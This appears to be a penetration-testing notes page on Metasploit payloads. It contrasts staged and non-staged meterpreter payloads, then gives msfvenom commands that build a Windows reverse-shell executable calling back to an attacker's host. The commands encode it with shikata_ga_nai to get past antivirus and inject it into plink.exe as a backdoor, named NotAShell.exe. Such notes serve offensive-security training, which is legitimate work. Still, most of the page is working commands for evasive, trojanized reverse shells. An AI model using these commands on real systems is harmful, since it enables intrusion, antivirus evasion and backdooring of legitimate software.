Payloads
Staged vs. Non-staged Payloads
A non-staged payload is sent in its entirety along with the exploit. For example:
windows/x64/meterpreter_reverse_tcp
In contrast, a staged payload is usually sent in two parts. The first part contains a small primary payload that causes the victim machine to connect back to the attacker, transfer a larger secondary payload containing the rest of the shellcode, and then execute it. For example:
windows/x64/meterpreter/reverse_tcp
Use staged payloads when:
The vulnerability we are exploiting does not have enough buffer space to hold a full payload.
Antivirus software blocks the non-staged payload.
Executable Payloads
Generate a raw Windows PE reverse shell executable with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -o NotAShell.exe
Improve the above payload by encoding it for 9 iterations:
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o NotAShell.exe
Further improve the above payload by injecting the payload into an existing PE file (it means creating a backdoor):
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o NotAShell.exe
This payload generation process can be accomplished within msfconsole with the generate
command:

Last updated
Was this helpful?